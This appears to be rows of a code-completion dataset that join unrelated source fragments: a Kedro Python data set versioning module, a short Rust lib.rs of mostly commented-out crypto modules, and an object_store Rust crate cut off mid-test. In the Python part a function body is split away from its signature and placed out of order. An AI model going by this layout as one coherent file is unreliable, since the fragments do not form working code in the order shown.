return logging.getLogger(__name__)
def get_last_load_version(self) -> Optional[str]:
"""Versioned datasets should override this property to return last loaded
version"""
# pylint: disable=no-self-use
return None # pragma: no cover
def load(self) -> Any:
"""Loads data by delegation to the provided load method.
Returns:
Data returned by the provided load method.
Raises:
DataSetError: When underlying load method raises error.
"""
self._logger.debug("Loading %s", str(self))
try:
return self._load()
except DataSetError:
raise
except Exception as exc:
# This exception handling is by design as the composed data sets
# can throw any type of exception.
message = "Failed while loading data from data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def get_last_save_version(self) -> Optional[str]:
"""Versioned datasets should override this property to return last saved
version."""
# pylint: disable=no-self-use
return None # pragma: no cover
def save(self, data: Any) -> None:
"""Saves data by delegation to the provided save method.
Args:
data: the value to be saved by provided save method.
Raises:
DataSetError: when underlying save method raises error.
"""
if data is None:
raise DataSetError("Saving `None` to a `DataSet` is not allowed")
try:
self._logger.debug("Saving %s", str(self))
self._save(data)
except DataSetError:
raise
except Exception as exc:
message = "Failed while saving data to data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def __str__(self):
def _to_str(obj, is_root=False):
"""Returns a string representation where
1. The root level (i.e. the DataSet.__init__ arguments) are
formatted like DataSet(key=value).
2. Dictionaries have the keys alphabetically sorted recursively.
3. Empty dictionaries and None values are not shown.
"""
fmt = "{}={}" if is_root else "'{}': {}" # 1
if isinstance(obj, dict):
sorted_dict = sorted(obj.items(), key=lambda pair: str(pair[0])) # 2
text = ", ".join(
fmt.format(key, _to_str(value)) # 2
for key, value in sorted_dict
if value or isinstance(value, bool)
) # 3
return text if is_root else "{" + text + "}" # 1
# not a dictionary
return str(obj)
return "{}({})".format(type(self).__name__, _to_str(self._describe(), True))
@abc.abstractmethod
def _load(self) -> Any:
raise NotImplementedError(
"`{}` is a subclass of AbstractDataSet and"
"it must implement the `_load` method".format(self.__class__.__name__)
)
@abc.abstractmethod
def _save(self, data: Any) -> None:
raise NotImplementedError(
"`{}` is a subclass of AbstractDataSet and"
"it must implement the `_save` method".format(self.__class__.__name__)
)
@abc.abstractmethod
def _describe(self) -> Dict[str, Any]:
raise NotImplementedError(
"`{}` is a subclass of AbstractDataSet and"
"it must implement the `_describe` method".format(self.__class__.__name__)
)
def exists(self) -> bool:
"""Checks whether a data set's output already exists by calling
the provided _exists() method.
Returns:
Flag indicating whether the output already exists.
Raises:
DataSetError: when underlying exists method raises error.
"""
try:
self._logger.debug("Checking whether target of %s exists", str(self))
return self._exists()
except Exception as exc:
message = "Failed during exists check for data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def _exists(self) -> bool:
self._logger.warning(
"`exists()` not implemented for `%s`. Assuming output does not exist.",
self.__class__.__name__,
)
return False
def release(self) -> None:
"""Release any cached data.
Raises:
DataSetError: when underlying exists method raises error.
"""
try:
self._logger.debug("Releasing %s", str(self))
self._release()
except Exception as exc:
message = "Failed during release for data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def _release(self) -> None:
pass
def generate_timestamp() -> str:
"""Generate the timestamp to be used by versioning.
Returns:
String representation of the current timestamp.
"""
current_ts = datetime.now(tz=timezone.utc)
fmt = (
"{d.year:04d}-{d.month:02d}-{d.day:02d}T{d.hour:02d}"
".{d.minute:02d}.{d.second:02d}.{ms:03d}Z"
)
return fmt.format(d=current_ts, ms=current_ts.microsecond // 1000)
class Version(namedtuple("Version", ["load", "save"])):
"""This namedtuple is used to provide load and save versions for versioned
data sets. If ``Version.load`` is None, then the latest available version
is loaded. If ``Version.save`` is None, then save version is formatted as
YYYY-MM-DDThh.mm.ss.sssZ of the current timestamp.
"""
__slots__ = ()
CONSISTENCY_WARNING = (
"Save version `{}` did not match load version `{}` for {}. This is strongly "
"discouraged due to inconsistencies it may cause between `save` and "
"`load` operations. Please refrain from setting exact load version for "
"intermediate data sets where possible to avoid this warning."
)
def parse_dataset_definition(
config: Dict[str, Any], load_version: str = None, save_version: str = None
) -> Tuple[Type[AbstractDataSet], Dict]:
|
def _local_exists(filepath: str) -> bool:
filepath = Path(filepath)
return filepath.exists() or any(par.is_file() for par in filepath.parents)
def is_remote_path(filepath: str) -> bool:
"""Check if the given path looks like a remote URL (has scheme)."""
# Get rid of Windows-specific "C:\" start,
# which is treated as a URL scheme.
_, filepath = os.path.splitdrive(filepath)
return bool(urlparse(filepath).scheme)
class AbstractVersionedDataSet(AbstractDataSet, abc.ABC):
"""
``AbstractVersionedDataSet`` is the base class for all versioned data set
implementations. All data sets that implement versioning should extend this
abstract class and implement the methods marked as abstract.
Example:
::
>>> from kedro.io import AbstractVersionedDataSet
>>> import pandas as pd
>>>
>>>
>>> class MyOwnDataSet(AbstractVersionedDataSet):
>>> def __init__(self, param1, param2, filepath, version):
>>> super().__init__(filepath, version)
>>> self._param1 = param1
>>> self._param2 = param2
>>>
>>> def _load(self) -> pd.DataFrame:
>>> load_path = self._get_load_path()
>>> return pd.read_csv(load_path)
>>>
>>> def _save(self, df: pd.DataFrame) -> None:
>>> save_path = self._get_save_path()
>>> df.to_csv(str(save_path))
>>>
>>> def _exists(self) -> bool:
>>> path = self._get_load_path()
>>> return path.is_file()
>>>
>>> def _describe(self):
>>> return dict(version=self._version, param1=self._param1, param2=self._param2)
"""
# pylint: disable=abstract-method
def __init__(
self,
filepath: PurePath,
version: Optional[Version],
exists_function: Callable[[str], bool] = None,
glob_function: Callable[[str], List[str]] = None,
):
"""Creates a new instance of ``AbstractVersionedDataSet``.
Args:
filepath: Path to file.
version: If specified, should be an instance of
``kedro.io.core.Version``. If its ``load`` attribute is
None, the latest version will be loaded. If its ``save``
attribute is None, save version will be autogenerated.
exists_function: Function that is used for determining whether
a path exists in a filesystem.
glob_function: Function that is used for finding all paths
in a filesystem, which match a given pattern.
"""
self._filepath = filepath
self._version = version
self._exists_function = exists_function or _local_exists
self._glob_function = glob_function or iglob
self._last_load_version = None # type: Optional[str]
self._last_save_version = None # type: Optional[str]
def get_last_load_version(self) -> Optional[str]:
return self._last_load_version
def _lookup_load_version(self) -> Optional[str]:
if not self._version:
return None
if self._version.load:
return self._version.load
# When load version is unpinned, fetch the most recent existing
# version from the given path
pattern = str(self._get_versioned_path("*"))
version_paths = sorted(self._glob_function(pattern), reverse=True)
most_recent = next(
(path for path in version_paths if self._exists_function(path)), None
)
if not most_recent:
raise VersionNotFoundError(
"Did not find any versions for {}".format(str(self))
)
return PurePath(most_recent).parent.name
def _get_load_path(self) -> PurePath:
if not self._version:
# When versioning is disabled, load from original filepath
return self._filepath
load_version = self._last_load_version or self._lookup_load_version()
return self._get_versioned_path(load_version) # type: ignore
def get_last_save_version(self) -> Optional[str]:
return self._last_save_version
def _lookup_save_version(self) -> Optional[str]:
if not self._version:
return None
return self._version.save or generate_timestamp()
def _get_save_path(self) -> PurePath:
if not self._version:
# When versioning is disabled, return original filepath
return self._filepath
save_version = self._last_save_version or self._lookup_save_version()
versioned_path = self._get_versioned_path(save_version) # type: ignore
if self._exists_function(str(versioned_path)):
raise DataSetError(
"Save path `{}` for {} must not exist if versioning "
"is enabled.".format(versioned_path, str(self))
)
return versioned_path
def _get_versioned_path(self, version: str) -> PurePath:
return self._filepath / version / self._filepath.name
def load(self) -> Any:
self._last_load_version = self._lookup_load_version()
return super().load()
def save(self, data: Any) -> None:
self._last_save_version = self._lookup_save_version()
super().save(data)
load_version = self._lookup_load_version()
if load_version != self._last_save_version:
warn(
CONSISTENCY_WARNING.format(
self._last_save_version, load_version, str(self)
)
)
def exists(self) -> bool:
"""Checks whether a data set's output already exists by calling
the provided _exists() method.
Returns:
Flag indicating whether the output already exists.
Raises:
DataSetError: when underlying exists method raises error.
"""
self._logger.debug("Checking whether target of %s exists", str(self))
try:
return self._exists()
except VersionNotFoundError:
return False
except Exception as exc:
message = "Failed during exists check for data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
| """Parse and instantiate a dataset class using the configuration provided.
Args:
config: Data set config dictionary. It *must* contain the `type` key
with fully qualified class name.
load_version: Version string to be used for ``load`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
save_version: Version string to be used for ``save`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
Raises:
DataSetError: If the function fails to parse the configuration provided.
Returns:
2-tuple: (Dataset class object, configuration dictionary)
"""
save_version = save_version or generate_timestamp()
config = copy.deepcopy(config)
if "type" not in config:
raise DataSetError("`type` is missing from DataSet catalog configuration")
class_obj = config.pop("type")
if isinstance(class_obj, str):
try:
class_obj = load_obj(class_obj, "kedro.io")
except ImportError:
raise DataSetError(
"Cannot import module when trying to load type `{}`.".format(class_obj)
)
except AttributeError:
raise DataSetError("Class `{}` not found.".format(class_obj))
if not issubclass(class_obj, AbstractDataSet):
raise DataSetError(
"DataSet type `{}.{}` is invalid: all data set types must extend "
"`AbstractDataSet`.".format(class_obj.__module__, class_obj.__qualname__)
)
if VERSION_KEY in config:
# remove "version" key so that it's not passed
# to the "unversioned" data set constructor
message = (
"`%s` attribute removed from data set configuration since it is a "
"reserved word and cannot be directly specified"
)
logging.getLogger(__name__).warning(message, VERSION_KEY)
del config[VERSION_KEY]
if config.pop(VERSIONED_FLAG_KEY, False): # data set is versioned
config[VERSION_KEY] = Version(load_version, save_version)
return class_obj, config |
lib.rs | //pub mod sha2;
//pub mod hmac; | //pub mod salsa20;
//pub mod chacha20poly1305;
pub mod ed25519;
//pub mod curve25519;
//pub mod nacl; | //pub mod poly1305;
//pub mod chacha20; |
lib.rs | #![deny(rustdoc::broken_intra_doc_links, rustdoc::bare_urls, rust_2018_idioms)]
#![warn(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
clippy::explicit_iter_loop,
clippy::future_not_send,
clippy::use_self,
clippy::clone_on_ref_ptr
)]
//! # object_store
//!
//! This crate provides APIs for interacting with object storage services. It
//! currently supports PUT, GET, DELETE, and list for Google Cloud Storage,
//! Amazon S3, in-memory and local file storage.
//!
//! Future compatibility will include Azure Blob Storage, Minio, and Ceph.
#[cfg(feature = "aws")]
mod aws;
#[cfg(feature = "azure")]
mod azure;
mod buffer;
mod disk;
#[cfg(feature = "gcp")]
mod gcp;
mod memory;
pub mod path;
mod throttle;
pub mod cache;
pub mod dummy;
#[cfg(not(feature = "aws"))]
use dummy as aws;
#[cfg(not(feature = "azure"))]
use dummy as azure;
#[cfg(not(feature = "gcp"))]
use dummy as gcp;
use aws::AmazonS3;
use azure::MicrosoftAzure;
use disk::File;
use gcp::GoogleCloudStorage;
use memory::InMemory;
use path::{parsed::DirsAndFileName, ObjectStorePath};
use throttle::ThrottledStore;
/// Publically expose throttling configuration
pub use throttle::ThrottleConfig;
use crate::{
cache::{Cache, LocalFSCache},
path::Path,
};
use async_trait::async_trait;
use bytes::Bytes;
use chrono::{DateTime, Utc};
use futures::{stream::BoxStream, StreamExt, TryFutureExt, TryStreamExt};
use snafu::{ResultExt, Snafu};
use std::{fmt::Formatter, num::NonZeroUsize};
use std::{path::PathBuf, sync::Arc};
/// Universal API to multiple object store services.
#[async_trait]
pub trait ObjectStoreApi: Send + Sync + 'static {
/// The type of the locations used in interacting with this object store.
type Path: path::ObjectStorePath;
/// The error returned from fallible methods
type Error: std::error::Error + Send + Sync + 'static;
/// Return a new location path appropriate for this object storage
fn new_path(&self) -> Self::Path;
/// Return a new location path constructed from a string appropriate for this object storage
fn path_from_raw(&self, raw: &str) -> Self::Path;
/// Save the provided bytes to the specified location.
async fn put(&self, location: &Self::Path, bytes: Bytes) -> Result<(), Self::Error>;
/// Return the bytes that are stored at the specified location.
async fn get(&self, location: &Self::Path) -> Result<GetResult<Self::Error>, Self::Error>;
/// Delete the object at the specified location.
async fn delete(&self, location: &Self::Path) -> Result<(), Self::Error>;
/// List all the objects with the given prefix.
///
/// Prefixes are evaluated on a path segment basis, i.e. `foo/bar/` is a prefix of `foo/bar/x` but not of
/// `foo/bar_baz/x`.
async fn list<'a>(
&'a self,
prefix: Option<&'a Self::Path>,
) -> Result<BoxStream<'a, Result<Vec<Self::Path>, Self::Error>>, Self::Error>;
/// List objects with the given prefix and an implementation specific
/// delimiter. Returns common prefixes (directories) in addition to object
/// metadata.
///
/// Prefixes are evaluated on a path segment basis, i.e. `foo/bar/` is a prefix of `foo/bar/x` but not of
/// `foo/bar_baz/x`.
async fn list_with_delimiter(
&self,
prefix: &Self::Path,
) -> Result<ListResult<Self::Path>, Self::Error>;
}
/// Universal interface to multiple object store services.
#[derive(Debug)]
pub struct ObjectStore {
/// The object store
pub integration: ObjectStoreIntegration,
cache: Option<ObjectStoreFileCache>,
}
impl ObjectStore {
/// Configure a connection to Amazon S3.
pub fn new_amazon_s3(
access_key_id: Option<impl Into<String>>,
secret_access_key: Option<impl Into<String>>,
region: impl Into<String>,
bucket_name: impl Into<String>,
endpoint: Option<impl Into<String>>,
session_token: Option<impl Into<String>>,
max_connections: NonZeroUsize,
) -> Result<Self> {
let s3 = aws::new_s3(
access_key_id,
secret_access_key,
region,
bucket_name,
endpoint,
session_token,
max_connections,
)?;
Ok(Self {
integration: ObjectStoreIntegration::AmazonS3(s3),
cache: None,
})
}
/// Configure a connection to Google Cloud Storage.
pub fn new_google_cloud_storage(
service_account_path: impl AsRef<std::ffi::OsStr>,
bucket_name: impl Into<String>,
) -> Result<Self> {
let gcs = gcp::new_gcs(service_account_path, bucket_name)?;
Ok(Self {
integration: ObjectStoreIntegration::GoogleCloudStorage(gcs),
cache: None,
})
}
/// Configure in-memory storage.
pub fn new_in_memory() -> Self {
let in_mem = InMemory::new();
Self {
integration: ObjectStoreIntegration::InMemory(in_mem),
cache: None,
}
}
/// For Testing: Configure throttled in-memory storage.
pub fn new_in_memory_throttled(config: ThrottleConfig) -> Self {
let in_mem = InMemory::new();
let in_mem_throttled = ThrottledStore::new(in_mem, config);
Self {
integration: ObjectStoreIntegration::InMemoryThrottled(in_mem_throttled),
cache: None,
}
}
/// For Testing: Configure a object store with invalid credentials
/// that will always fail on operations (hopefully)
pub fn new_failing_store() -> Result<Self> {
let s3 = aws::new_failing_s3()?;
Ok(Self {
integration: ObjectStoreIntegration::AmazonS3(s3),
cache: None,
})
}
/// Configure local file storage, rooted at `root`
pub fn new_file(root: impl Into<PathBuf>) -> Self {
let file = File::new(root);
Self {
integration: ObjectStoreIntegration::File(file),
cache: None,
}
}
/// Configure a connection to Microsoft Azure Blob store.
pub fn new_microsoft_azure(
account: impl Into<String>,
access_key: impl Into<String>,
container_name: impl Into<String>,
use_emulator: bool,
) -> Result<Self> {
let azure = azure::new_azure(account, access_key, container_name, use_emulator)?;
Ok(Self {
integration: ObjectStoreIntegration::MicrosoftAzure(Box::new(azure)),
cache: None,
})
}
/// Create implementation-specific path from parsed representation.
pub fn path_from_dirs_and_filename(&self, path: DirsAndFileName) -> path::Path {
use ObjectStoreIntegration::*;
match &self.integration {
AmazonS3(_) => path::Path::AmazonS3(path.into()),
GoogleCloudStorage(_) => path::Path::GoogleCloudStorage(path.into()),
InMemory(_) => path::Path::InMemory(path),
InMemoryThrottled(_) => path::Path::InMemory(path),
File(_) => path::Path::File(path.into()),
MicrosoftAzure(_) => path::Path::MicrosoftAzure(path.into()),
}
}
/// Returns the filesystem cache if configured
pub fn cache(&self) -> &Option<ObjectStoreFileCache> {
&self.cache
}
}
#[async_trait]
impl ObjectStoreApi for ObjectStore {
type Path = path::Path;
type Error = Error;
fn new_path(&self) -> Self::Path {
use ObjectStoreIntegration::*;
match &self.integration {
AmazonS3(s3) => path::Path::AmazonS3(s3.new_path()),
GoogleCloudStorage(gcs) => path::Path::GoogleCloudStorage(gcs.new_path()),
InMemory(in_mem) => path::Path::InMemory(in_mem.new_path()),
InMemoryThrottled(in_mem_throttled) => {
path::Path::InMemory(in_mem_throttled.new_path())
}
File(file) => path::Path::File(file.new_path()),
MicrosoftAzure(azure) => path::Path::MicrosoftAzure(azure.new_path()),
}
}
fn path_from_raw(&self, raw: &str) -> Self::Path {
use ObjectStoreIntegration::*;
match &self.integration {
AmazonS3(s3) => path::Path::AmazonS3(s3.path_from_raw(raw)),
GoogleCloudStorage(gcs) => path::Path::GoogleCloudStorage(gcs.path_from_raw(raw)),
InMemory(in_mem) => path::Path::InMemory(in_mem.path_from_raw(raw)),
InMemoryThrottled(in_mem_throttled) => {
path::Path::InMemory(in_mem_throttled.path_from_raw(raw))
}
File(file) => path::Path::File(file.path_from_raw(raw)),
MicrosoftAzure(azure) => path::Path::MicrosoftAzure(azure.path_from_raw(raw)),
}
}
async fn put(&self, location: &Self::Path, bytes: Bytes) -> Result<()> {
use ObjectStoreIntegration::*;
match (&self.integration, location) {
(AmazonS3(s3), path::Path::AmazonS3(location)) => s3.put(location, bytes).await?,
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(location)) => gcs
.put(location, bytes)
.await
.context(GcsObjectStoreSnafu)?,
(InMemory(in_mem), path::Path::InMemory(location)) => {
in_mem.put(location, bytes).await?
}
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(location)) => {
in_mem_throttled.put(location, bytes).await?
}
(File(file), path::Path::File(location)) => file
.put(location, bytes)
.await
.context(FileObjectStoreSnafu)?,
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(location)) => {
azure.put(location, bytes).await?
}
_ => unreachable!(),
}
Ok(())
}
async fn get(&self, location: &Self::Path) -> Result<GetResult<Error>> {
use ObjectStoreIntegration::*;
Ok(match (&self.integration, location) {
(AmazonS3(s3), path::Path::AmazonS3(location)) => s3.get(location).await?.err_into(),
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(location)) => {
gcs.get(location).await?.err_into()
}
(InMemory(in_mem), path::Path::InMemory(location)) => {
in_mem.get(location).await?.err_into()
}
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(location)) => {
in_mem_throttled.get(location).await?.err_into()
}
(File(file), path::Path::File(location)) => file.get(location).await?.err_into(),
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(location)) => {
azure.get(location).await?.err_into()
}
_ => unreachable!(),
})
}
async fn delete(&self, location: &Self::Path) -> Result<()> {
use ObjectStoreIntegration::*;
match (&self.integration, location) {
(AmazonS3(s3), path::Path::AmazonS3(location)) => s3.delete(location).await?,
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(location)) => {
gcs.delete(location).await?
}
(InMemory(in_mem), path::Path::InMemory(location)) => in_mem.delete(location).await?,
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(location)) => {
in_mem_throttled.delete(location).await?
}
(File(file), path::Path::File(location)) => file.delete(location).await?,
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(location)) => {
azure.delete(location).await?
}
_ => unreachable!(),
}
Ok(())
}
async fn list<'a>(
&'a self,
prefix: Option<&'a Self::Path>,
) -> Result<BoxStream<'a, Result<Vec<Self::Path>>>> {
use ObjectStoreIntegration::*;
Ok(match (&self.integration, prefix) {
(AmazonS3(s3), Some(path::Path::AmazonS3(prefix))) => s3
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::AmazonS3).collect())
.err_into()
.boxed(),
(AmazonS3(s3), None) => s3
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::AmazonS3).collect())
.err_into()
.boxed(),
(GoogleCloudStorage(gcs), Some(path::Path::GoogleCloudStorage(prefix))) => gcs
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::GoogleCloudStorage).collect())
.err_into()
.boxed(),
(GoogleCloudStorage(gcs), None) => gcs
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::GoogleCloudStorage).collect())
.err_into()
.boxed(),
(InMemory(in_mem), Some(path::Path::InMemory(prefix))) => in_mem
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed(),
(InMemory(in_mem), None) => in_mem
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed(),
(InMemoryThrottled(in_mem_throttled), Some(path::Path::InMemory(prefix))) => {
in_mem_throttled
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed()
}
(InMemoryThrottled(in_mem_throttled), None) => in_mem_throttled
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed(),
(File(file), Some(path::Path::File(prefix))) => file
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::File).collect())
.err_into()
.boxed(),
(File(file), None) => file
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::File).collect())
.err_into()
.boxed(),
(MicrosoftAzure(azure), Some(path::Path::MicrosoftAzure(prefix))) => azure
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::MicrosoftAzure).collect())
.err_into()
.boxed(),
(MicrosoftAzure(azure), None) => azure
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::MicrosoftAzure).collect())
.err_into()
.boxed(),
_ => unreachable!(),
})
}
async fn list_with_delimiter(&self, prefix: &Self::Path) -> Result<ListResult<Self::Path>> {
use ObjectStoreIntegration::*;
match (&self.integration, prefix) {
(AmazonS3(s3), path::Path::AmazonS3(prefix)) => s3
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::AmazonS3))
.await
.context(AwsObjectStoreSnafu),
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(prefix)) => gcs
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::GoogleCloudStorage))
.await
.context(GcsObjectStoreSnafu),
(InMemory(in_mem), path::Path::InMemory(prefix)) => in_mem
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::InMemory))
.await
.context(InMemoryObjectStoreSnafu),
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(prefix)) => in_mem_throttled
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::InMemory))
.await
.context(InMemoryObjectStoreSnafu),
(File(file), path::Path::File(prefix)) => file
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::File))
.await
.context(FileObjectStoreSnafu),
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(prefix)) => azure
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::MicrosoftAzure))
.await
.context(AzureObjectStoreSnafu),
_ => unreachable!(),
}
}
}
/// All supported object storage integrations
#[derive(Debug)]
pub enum ObjectStoreIntegration {
/// GCP storage
GoogleCloudStorage(GoogleCloudStorage),
/// Amazon storage
AmazonS3(AmazonS3),
/// In memory storage for testing
InMemory(InMemory),
/// Throttled in memory storage for testing
InMemoryThrottled(ThrottledStore<InMemory>),
/// Local file system storage
File(File),
/// Microsoft Azure Blob storage
MicrosoftAzure(Box<MicrosoftAzure>),
}
/// Cache wrapper so local file object store can pass through to its implementation
/// while others use the `LocalFSCache`.
#[derive(Debug)]
pub enum ObjectStoreFileCache {
/// If using the local filesystem for object store, don't create additional copies for caching
Passthrough(File),
/// Remote object stores should use the LocalFSCache implementation
File(LocalFSCache),
}
#[async_trait]
impl Cache for ObjectStoreFileCache {
fn evict(&self, path: &Path) -> crate::cache::Result<()> {
match &self {
Self::Passthrough(f) => f.evict(path),
Self::File(f) => f.evict(path),
}
}
async fn fs_path_or_cache(
&self,
path: &Path,
store: Arc<ObjectStore>,
) -> crate::cache::Result<&str> {
match &self {
Self::Passthrough(f) => f.fs_path_or_cache(path, store).await,
Self::File(f) => f.fs_path_or_cache(path, store).await,
}
}
fn size(&self) -> u64 {
match &self {
Self::Passthrough(f) => f.size(),
Self::File(f) => f.size(),
}
}
fn limit(&self) -> u64 {
match &self {
Self::Passthrough(f) => f.size(),
Self::File(f) => f.size(),
}
}
}
/// Result of a list call that includes objects, prefixes (directories) and a
/// token for the next set of results. Individual result sets may be limited to
/// 1,000 objects based on the underlying object storage's limitations.
#[derive(Debug)]
pub struct ListResult<P: ObjectStorePath> {
/// Token passed to the API for the next page of list results.
pub next_token: Option<String>,
/// Prefixes that are common (like directories)
pub common_prefixes: Vec<P>,
/// Object metadata for the listing
pub objects: Vec<ObjectMeta<P>>,
}
#[allow(clippy::use_self)] // https://github.com/rust-lang/rust-clippy/issues/3410
impl<P: ObjectStorePath> ListResult<P> {
/// `c` is a function that can turn one type that implements an
/// `ObjectStorePath` to another type that also implements
/// `ObjectStorePath`.
fn map_paths<Q: ObjectStorePath, C>(self, c: C) -> ListResult<Q>
where
C: Fn(P) -> Q,
{
let Self {
next_token,
common_prefixes,
objects,
} = self;
ListResult {
next_token,
common_prefixes: common_prefixes.into_iter().map(&c).collect(),
objects: objects.into_iter().map(|o| o.map_paths(&c)).collect(),
}
}
}
/// The metadata that describes an object.
#[derive(Debug)]
pub struct ObjectMeta<P: ObjectStorePath> {
/// The full path to the object
pub location: P,
/// The last modified time
pub last_modified: DateTime<Utc>,
/// The size in bytes of the object
pub size: usize,
}
#[allow(clippy::use_self)] // https://github.com/rust-lang/rust-clippy/issues/3410
impl<P: ObjectStorePath> ObjectMeta<P> {
/// `c` is a function that can turn one type that implements an
/// `ObjectStorePath` to another type that also implements
/// `ObjectStorePath`.
fn map_paths<Q: ObjectStorePath, C>(self, c: C) -> ObjectMeta<Q>
where
C: Fn(P) -> Q,
{
let Self {
location,
last_modified,
size,
} = self;
ObjectMeta {
location: c(location),
last_modified,
size,
}
}
}
/// Result for a get request
pub enum GetResult<E> {
/// A file
File(tokio::fs::File, std::path::PathBuf),
/// An asynchronous stream
Stream(BoxStream<'static, Result<Bytes, E>>),
}
impl<E> std::fmt::Debug for GetResult<E> {
fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result {
match self {
GetResult::File(_, _) => write!(f, "GetResult(File)"),
GetResult::Stream(_) => write!(f, "GetResult(Stream)"),
}
}
}
impl GetResult<Error> {
/// Collects the data into a [`Vec<u8>`]
pub async fn bytes(self) -> Result<Vec<u8>, Error> {
let mut stream = self.into_stream();
let mut bytes = Vec::new();
while let Some(next) = stream.next().await {
bytes.extend_from_slice(next?.as_ref())
}
Ok(bytes)
}
/// Converts this into a byte stream
pub fn into_stream(self) -> BoxStream<'static, Result<Bytes, Error>> {
match self {
Self::File(file, path) => {
tokio_util::codec::FramedRead::new(file, tokio_util::codec::BytesCodec::new())
.map_ok(|b| b.freeze())
.map_err(move |source| Error::FileObjectStoreError {
source: disk::Error::UnableToReadBytes {
source,
path: path.clone(),
},
})
.boxed()
}
Self::Stream(s) => s,
}
}
}
impl<E: 'static> GetResult<E> {
/// Maps the error
fn err_into<T: From<E> + 'static>(self) -> GetResult<T> {
match self {
Self::File(f, p) => GetResult::File(f, p),
Self::Stream(s) => GetResult::Stream(s.err_into().boxed()),
}
}
}
/// A specialized `Result` for object store-related errors
pub type Result<T, E = Error> = std::result::Result<T, E>;
/// A specialized `Error` for object store-related errors
#[derive(Debug, Snafu)]
#[allow(missing_docs)]
pub enum Error {
#[snafu(display("File-based Object Store error: {}", source))]
FileObjectStoreError { source: disk::Error },
#[snafu(display("Google Cloud Storage-based Object Store error: {}", source))]
GcsObjectStoreError { source: gcp::Error },
#[snafu(display("AWS S3-based Object Store error: {}", source))]
AwsObjectStoreError { source: aws::Error },
#[snafu(display("Azure Blob storage-based Object Store error: {}", source))]
AzureObjectStoreError { source: azure::Error },
#[snafu(display("In-memory-based Object Store error: {}", source))]
InMemoryObjectStoreError { source: memory::Error },
#[snafu(display("{}", source))]
DummyObjectStoreError { source: dummy::Error },
#[snafu(display("Object at location {} not found: {}", path, source))]
NotFound {
path: String,
source: Box<dyn std::error::Error + Send + Sync + 'static>,
},
}
impl From<disk::Error> for Error {
fn from(source: disk::Error) -> Self {
match source {
disk::Error::NotFound { path, source } => Self::NotFound {
path,
source: source.into(),
},
_ => Self::FileObjectStoreError { source },
}
}
}
#[cfg(feature = "gcp")]
impl From<gcp::Error> for Error {
fn from(source: gcp::Error) -> Self {
match source {
gcp::Error::NotFound { path, source } => Self::NotFound {
path,
source: source.into(),
},
_ => Self::GcsObjectStoreError { source },
}
}
}
#[cfg(feature = "aws")]
impl From<aws::Error> for Error {
fn from(source: aws::Error) -> Self {
match source {
aws::Error::NotFound { path, source } => Self::NotFound {
path,
source: source.into(),
},
_ => Self::AwsObjectStoreError { source },
}
}
}
#[cfg(feature = "azure")]
impl From<azure::Error> for Error {
fn from(source: azure::Error) -> Self {
Self::AzureObjectStoreError { source }
}
}
impl From<memory::Error> for Error {
fn from(source: memory::Error) -> Self {
match source {
memory::Error::NoDataInMemory { ref path } => Self::NotFound {
path: path.into(),
source: source.into(),
},
// currently "not found" is the only error that can happen with the in-memory store
}
}
}
impl From<dummy::Error> for Error {
fn from(source: dummy::Error) -> Self {
Self::DummyObjectStoreError { source }
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::path::{cloud::CloudPath, parsed::DirsAndFileName, ObjectStorePath};
use futures::stream;
type Error = Box<dyn std::error::Error + Send + Sync + 'static>;
type Result<T, E = Error> = std::result::Result<T, E>;
async fn flatten_list_stream(
storage: &ObjectStore,
prefix: Option<&path::Path>,
) -> Result<Vec<path::Path>> {
storage
.list(prefix)
.await?
.map_ok(|v| stream::iter(v).map(Ok))
.try_flatten()
.try_collect()
.await
}
pub(crate) async fn put_get_delete_list(storage: &ObjectStore) -> Result<()> {
delete_fixtures(storage).await;
let content_list = flatten_list_stream(storage, None).await?;
assert!(
content_list.is_empty(),
"Expected list to be empty; found: {:?}",
content_list
);
let mut location = storage.new_path();
location.push_dir("test_dir");
location.set_file_name("test_file.json");
let data = Bytes::from("arbitrary data");
let expected_data = data.clone();
storage.put(&location, data).await?;
// List everything
